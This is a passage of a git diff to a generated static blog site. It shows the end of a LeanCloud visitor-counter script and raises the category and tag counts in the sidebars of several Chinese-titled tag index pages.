+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/tags/数据库/index.html b/tags/数据库/index.html
index 1134bce9..b5cb6c07 100644
--- a/tags/数据库/index.html
+++ b/tags/数据库/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html
index 35406c22..0c806546 100644
--- a/tags/数据挖掘/index.html
+++ b/tags/数据挖掘/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html
index db88c9ca..a0991527 100644
--- a/tags/文件格式/index.html
+++ b/tags/文件格式/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html
index 2e8628c7..afd27169 100644
--- a/tags/模型实现/index.html
+++ b/tags/模型实现/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html
index 2d34571a..6f724c34 100644
--- a/tags/自然语言处理/index.html
+++ b/tags/自然语言处理/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html
index e7466c64..eb0fdbe6 100644
--- a/tags/访问控制/index.html
+++ b/tags/访问控制/index.html
@@ -378,7 +378,7 @@
               
               <div class="site-state-item site-state-categories">
                 <a href="/categories/index.html">
-                  <span class="site-state-item-count">4</span>
+                  <span class="site-state-item-count">5</span>
                   <span class="site-state-item-name">分类</span>
                 </a>
               </div>
@@ -389,7 +389,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">14</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>